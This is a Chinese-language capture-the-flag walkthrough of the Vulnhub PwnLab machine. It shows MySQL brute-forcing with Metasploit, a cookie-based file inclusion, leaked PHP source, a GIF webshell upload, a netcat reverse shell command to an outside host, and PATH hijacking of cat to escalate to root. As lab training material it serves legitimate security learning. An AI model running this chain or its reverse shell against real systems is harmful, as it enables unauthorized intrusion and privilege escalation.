Vulnhub靶机链接回【PwnLab】
首页有一个登录框
image-20240807124822770
他没有验证码,我们试试暴力破解
image-20240807122743025
开始爆破了,全部失败,哈哈哈
image-20240807122851001
nmap全端口扫描试试
image-20240807131408315
有mysql服务,再爆破一下数据库,使用msf框架
use auxiliary/scanner/mysql/mysql_login
set rhosts 192.168.71.1 //设置目标服务器的ip地址
set rport 3306 //设置目标端口,为MySQL开启的端口号,默认是3306
set username root //设置用户名,默认即为root
set pass_file /home/kali/pass.txt //指定密码字典文件的路径
run //开始爆破
爆破失败。。。。。。
image-20240807130714714
在url上面有一个page,猜测是文件包含漏洞,我们包含/etc/passwd,没有效果
image-20240807164615966
php filter伪协议试试也不行
image-20240807170053674
这些都试过了,那么直接包含index呢,出来了index的源码,就可以发现它的包含规则不能包含后缀
image-20240807170122370
解码看看,对这个lang的cookie进行文件包含
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
御剑目录扫描一下
image-20240807172346507
包含upload,并base64解码,获取源码
<?php
session_start();
if (!isset($_SESSION['user'])) { die('你没有登录.'); }
?>
<html><body><form action='' method='post' enctype='multipart/form-data'><input type='file' name='file' id='file' /><input type='submit' name='submit' value='Upload'/></form></body>
</html>
<?php
if(isset($_POST['submit'])) {if ($_FILES['file']['error'] <= 0) {$filename = $_FILES['file']['name'];$filetype = $_FILES['file']['type'];$uploaddir = 'upload/';$file_ext = strrchr($filename, '.');$imageinfo = getimagesize($_FILES['file']['tmp_name']);$whitelist = array(".jpg",".jpeg",".gif",".png"); if (!(in_array($file_ext, $whitelist))) {die('Not allowed extension, please upload images only.');}if(strpos($filetype,'image') === false) {die('Error 001');}if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {die('Error 002');}if(substr_count($filetype, '/')>1){die('Error 003');}$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {echo "<img src=\"".$uploadfile."\"><br />";} else {die('Error 4');}}
}?>
login源码,我们看到了有一个config.php引用,而且还是在当前目录
<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);if (isset($_POST['user']) and isset($_POST['pass']))
{$luser = $_POST['user'];$lpass = base64_encode($_POST['pass']);$stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");$stmt->bind_param('ss', $luser, $lpass);$stmt->execute();$stmt->store_Result();if ($stmt->num_rows == 1){$_SESSION['user'] = $luser;header('Location: ?page=upload');}else{echo "Login failed.";}
}
else
{?><form action="" method="POST"><label>用户名: </label><input id="user" type="test" name="user"><br /><label>密 码: </label><input id="pass" type="password" name="pass"><br /><input type="submit" name="submit" value="Login"></form><?php
}config包含
image-20240807170203368
解码,好有了mysql密码
image-20240807134448767
mysql连接
image-20240807134540048
指定好数据库
image-20240807134816919
找到指定表名就能看到用户密码了,密码有==号的话,那么大概率就是base64编码
image-20240807134848062
解码
image-20240807135110924
登录试试
image-20240807135123551
登录成功了,只允许图片上传
image-20240807135555426
我们分析之前找到的文件上传源码,是白名单
<?php
session_start();
if (!isset($_SESSION['user'])) { die('你没有登录.'); }
?>
<html><body><form action='' method='post' enctype='multipart/form-data'><input type='file' name='file' id='file' /><input type='submit' name='submit' value='Upload'/></form></body>
</html>
<?php
if(isset($_POST['submit'])) {if ($_FILES['file']['error'] <= 0) {$filename = $_FILES['file']['name'];$filetype = $_FILES['file']['type'];$uploaddir = 'upload/';$file_ext = strrchr($filename, '.');$imageinfo = getimagesize($_FILES['file']['tmp_name']);$whitelist = array(".jpg",".jpeg",".gif",".png"); if (!(in_array($file_ext, $whitelist))) {die('Not allowed extension, please upload images only.');}if(strpos($filetype,'image') === false) {die('Error 001');}if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {die('Error 002');}if(substr_count($filetype, '/')>1){die('Error 003');}$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {echo "<img src=\"".$uploadfile."\"><br />";} else {die('Error 4');}}
}?>
图片马gif正常上传
image-20240807170244303
我们用dirb扫到一个目录
image-20240807140150950
gif上传成功
image-20240807140200246
伪协议包含不成功
image-20240807170303756
分析index.php源代码,它对cookie的值作为路径,这个参数为lang
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
那我们就添加一个cookielang=../upload/66c30a7180c399c3188ff89f1e2c5c02.gif
image-20240807141325596
此时回到首页
image-20240807170320504
蚁剑连接试试
image-20240807141621704
这里不要忘了添加cookie
image-20240807141646389
反弹测试nc,有e参数,可以用nc反弹shell
nc 10.0.0.190 80 -e /bin/bash
image-20240807142125319
反弹成功
image-20240807142325791
终端升级
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
切换root账号,弱口令成功了。。。。
image-20240807144049758
image-20240807144219447
如果不用弱口令,正常情况是这样的,找到数据库中的密码和用户
image-20240807144751018
猜测这个用户能用登录该系统,但是登录成功后,没什么利用价值
image-20240807144818674
切换用户kane,里面有一个msgmike文件,查看它,这有一个命令
image-20240807145131804
查看这个文件没有权限
image-20240807145214205
我们切换这个mike用户,不能登录,鉴权失败,我们也就无法查看这个文件
image-20240807145344318
然而当我们调用cat命令的时候,cat会从以上目录来寻找,如果我们添加.到$PATH环境变量,
则会先从当前目录来寻找cat指令,相当于我们自己创建一个读文件的cat指令,用这个指令来
读新建取/home/mike/msg.txt文件,我们新建一个cat文件,并添加执行权限,依次执行以下命令
image-20240807160433869
这样当我们再次运行./msgmike命令的时候,就会触发当前目录下的cat(/bin/sh),
我们就会提升到mike权限:
image-20240807162051127
我们切换这个用户的跟目录发现有个msg2root
查看
image-20240807162730625
发现一个bin/bash会话,不断尝试,直到如下结果; /bin/bash -p才能够以root的权限查看flag.txt
image-20240807164449825